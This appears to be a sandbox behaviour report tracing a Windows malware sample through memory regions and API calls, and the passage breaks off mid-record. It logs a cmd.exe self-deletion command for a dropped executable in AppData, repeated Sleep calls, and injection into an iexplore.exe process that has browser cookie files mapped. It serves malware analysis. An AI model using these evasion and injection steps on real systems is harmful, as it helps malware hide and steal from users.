[0271.535] Sleep (dwMilliseconds=0x7d0) [0271.694] Sleep (dwMilliseconds=0x7d0) [0271.772] Sleep (dwMilliseconds=0x7d0) [0271.850] Sleep (dwMilliseconds=0x7d0) [0271.943] Sleep (dwMilliseconds=0x7d0) [0272.002] Sleep (dwMilliseconds=0x7d0) [0272.085] Sleep (dwMilliseconds=0x7d0) [0272.177] Sleep (dwMilliseconds=0x7d0) [0272.224] Sleep (dwMilliseconds=0x7d0) [0272.302] Sleep (dwMilliseconds=0x7d0) [0272.396] Sleep (dwMilliseconds=0x7d0) [0272.457] Sleep (dwMilliseconds=0x7d0) [0272.566] Sleep (dwMilliseconds=0x7d0) [0272.660] Sleep (dwMilliseconds=0x7d0) [0272.724] Sleep (dwMilliseconds=0x7d0) [0272.786] Sleep (dwMilliseconds=0x7d0) [0272.880] Sleep (dwMilliseconds=0x7d0) [0272.958] Sleep (dwMilliseconds=0x7d0) [0273.053] Sleep (dwMilliseconds=0x7d0) [0273.146] Sleep (dwMilliseconds=0x7d0) [0273.191] Sleep (dwMilliseconds=0x7d0) [0273.270] Sleep (dwMilliseconds=0x7d0) [0273.370] Sleep (dwMilliseconds=0x7d0) [0273.426] Sleep (dwMilliseconds=0x7d0) [0273.709] Sleep (dwMilliseconds=0x7d0) [0273.803] Sleep (dwMilliseconds=0x7d0) [0273.864] Sleep (dwMilliseconds=0x7d0) [0273.940] Sleep (dwMilliseconds=0x7d0) [0274.034] Sleep (dwMilliseconds=0x7d0) [0274.096] Sleep (dwMilliseconds=0x7d0) [0274.174] Sleep (dwMilliseconds=0x7d0) [0274.269] Sleep (dwMilliseconds=0x7d0) [0274.302] Sleep (dwMilliseconds=0x7d0) [0274.314] Sleep (dwMilliseconds=0x7d0) [0274.361] Sleep (dwMilliseconds=0x7d0) [0274.478] Sleep (dwMilliseconds=0x7d0) Thread: id = 172 os_tid = 0xf38 Thread: id = 173 os_tid = 0xf3c Thread: id = 198 os_tid = 0xfb4 Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x11790000" os_pid = "0xeec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xed8" cmd_line = "/c del \"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2069 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2070 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2071 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2072 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2073 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2074 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 2075 start_va = 0x150000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2076 start_va = 0x4aa90000 end_va = 0x4aadbfff monitored = 1 entry_point = 0x4aa9829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2077 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2078 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2079 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2080 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2081 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2082 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2083 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2084 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2085 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2086 start_va = 0xd0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2087 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2088 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2089 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2090 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2091 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2092 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2093 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2094 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2095 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2096 start_va = 0x250000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2097 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2098 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2099 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2100 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2101 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2102 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2103 start_va = 0x370000 end_va = 0x3d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2104 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2105 start_va = 0x66890000 end_va = 0x66896fff monitored = 0 entry_point = 0x66891230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 2106 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2107 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2108 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2109 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2110 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2111 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2112 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2113 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2114 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2115 start_va = 0x3e0000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2116 start_va = 0xb0000 end_va = 0xcdfff monitored = 0 entry_point = 0xc158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2117 start_va = 0x550000 end_va = 0x6d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2118 start_va = 0xb0000 end_va = 0xcdfff monitored = 0 entry_point = 0xc158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2119 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2120 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2121 start_va = 0x6e0000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 2122 start_va = 0x870000 end_va = 0x1c6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 2123 start_va = 0xb0000 end_va = 0xcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 2124 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2125 start_va = 0x250000 end_va = 0x250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2126 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Thread: id = 135 os_tid = 0xef0 [0132.804] GetProcAddress (hModule=0x772b0000, lpProcName="SetConsoleInputExeNameW") returned 0x772da775 [0132.806] GetProcessHeap () returned 0x270000 [0132.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x400a) returned 0x285a80 [0132.807] GetProcessHeap () returned 0x270000 [0132.807] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x285a80 | out: hHeap=0x270000) returned 1 [0132.807] _wcsicmp (_String1="del", _String2=")") returned 59 [0132.807] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0132.807] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0132.807] _wcsicmp (_String1="IF", _String2="del") returned 5 [0132.807] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0132.807] _wcsicmp (_String1="REM", _String2="del") returned 14 [0132.808] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0132.808] GetProcessHeap () returned 0x270000 [0132.808] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x58) returned 0x2831b0 [0132.808] GetProcessHeap () returned 0x270000 [0132.808] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10) returned 0x280098 [0132.809] GetProcessHeap () returned 0x270000 [0132.809] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x76) returned 0x285a98 [0132.810] GetConsoleTitleW (in: lpConsoleTitle=0x24f63c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0132.810] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0132.810] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0132.810] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0132.811] GetProcessHeap () returned 0x270000 [0132.811] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe4) returned 0x283210 [0132.811] GetProcessHeap () returned 0x270000 [0132.811] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x283210, Size=0x76) returned 0x283210 [0132.811] GetProcessHeap () returned 0x270000 [0132.811] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x283210) returned 0x76 [0132.813] GetProcessHeap () returned 0x270000 [0132.813] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x7e) returned 0x283290 [0132.813] GetProcessHeap () returned 0x270000 [0132.813] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe4) returned 0x283318 [0132.814] GetProcessHeap () returned 0x270000 [0132.814] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x283318, Size=0x76) returned 0x283318 [0132.814] GetProcessHeap () returned 0x270000 [0132.814] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x283318) returned 0x76 [0132.814] GetProcessHeap () returned 0x270000 [0132.814] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x70) returned 0x283398 [0132.814] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x24f3f4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.814] GetProcessHeap () returned 0x270000 [0132.814] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x38) returned 0x281fe0 [0132.814] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x24e484 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.814] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e6b4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x24e6b8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e6b4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0132.814] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0132.814] GetProcessHeap () returned 0x270000 [0132.814] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2c) returned 0x283410 [0132.814] GetProcessHeap () returned 0x270000 [0132.814] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x258) returned 0x283448 [0132.814] _wcsicmp (_String1="ibeframnk863.exe", _String2=".") returned 59 [0132.815] _wcsicmp (_String1="ibeframnk863.exe", _String2="..") returned 59 [0132.815] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe")) returned 0x2020 [0132.815] GetProcessHeap () returned 0x270000 [0132.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x210) returned 0x2707f0 [0132.815] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2707f8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.815] SetErrorMode (uMode=0x0) returned 0x1 [0132.815] SetErrorMode (uMode=0x1) returned 0x0 [0132.815] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", nBufferLength=0x104, lpBuffer=0x24ead8, lpFilePart=0x24eac0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", lpFilePart=0x24eac0*="ibeframnk863.exe") returned 0x33 [0132.815] SetErrorMode (uMode=0x1) returned 0x1 [0132.815] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming")) returned 0x2010 [0132.815] GetProcessHeap () returned 0x270000 [0132.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x258) returned 0x270a08 [0132.815] _wcsicmp (_String1="ibeframnk863.exe", _String2=".") returned 59 [0132.815] _wcsicmp (_String1="ibeframnk863.exe", _String2="..") returned 59 [0132.815] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe")) returned 0x2020 [0132.815] GetProcessHeap () returned 0x270000 [0132.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2a) returned 0x2836a8 [0132.815] GetProcessHeap () returned 0x270000 [0132.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4e) returned 0x2836e0 [0132.816] GetProcessHeap () returned 0x270000 [0132.816] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4e) returned 0x283738 [0132.816] GetProcessHeap () returned 0x270000 [0132.816] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x808) returned 0x284350 [0132.816] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", fInfoLevelId=0x0, lpFindFileData=0x28435c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28435c) returned 0x283790 [0132.816] GetProcessHeap () returned 0x270000 [0132.816] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x14) returned 0x2837d0 [0132.816] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ibeframnk863.exe")) returned 1 [0132.817] FindNextFileW (in: hFindFile=0x283790, lpFindFileData=0x28435c | out: lpFindFileData=0x28435c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x48b47100, ftCreationTime.dwHighDateTime=0x1d7b44f, ftLastAccessTime.dwLowDateTime=0x48b47100, ftLastAccessTime.dwHighDateTime=0x1d7b44f, ftLastWriteTime.dwLowDateTime=0x48c77c00, ftLastWriteTime.dwHighDateTime=0x1d7b44f, nFileSizeHigh=0x0, nFileSizeLow=0x98800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ibeframnk863.exe", cAlternateFileName="IBEFRA~1.EXE")) returned 0 [0132.818] GetLastError () returned 0x12 [0132.818] FindClose (in: hFindFile=0x283790 | out: hFindFile=0x283790) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x284350 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x283738 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2836a8 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2836e0 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x270a08 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2707f0 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x283448 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x283410 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x281fe0 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x283398 | out: hHeap=0x270000) returned 1 [0132.818] GetProcessHeap () returned 0x270000 [0132.818] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x283318 | out: hHeap=0x270000) returned 1 [0132.818] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.818] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.819] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.819] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aab41ac | out: lpMode=0x4aab41ac) returned 1 [0132.819] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.819] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aab41b0 | out: lpMode=0x4aab41b0) returned 1 [0132.819] SetConsoleInputExeNameW () returned 0x1 [0132.819] GetConsoleOutputCP () returned 0x1b5 [0132.819] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aab4260 | out: lpCPInfo=0x4aab4260) returned 1 [0132.819] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.819] exit (_Code=0) Process: id = "10" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x5394d000" os_pid = "0x694" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" about:blank" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2218 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2219 start_va = 0x20000 end_va = 0x21fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 2220 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2221 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2222 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2223 start_va = 0x60000 end_va = 0xc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2224 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2225 start_va = 0xe0000 end_va = 0xe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 2226 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2227 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2228 start_va = 0x110000 end_va = 0x111fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 2229 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2230 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 2231 start_va = 0x140000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2232 start_va = 0x180000 end_va = 0x187fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: 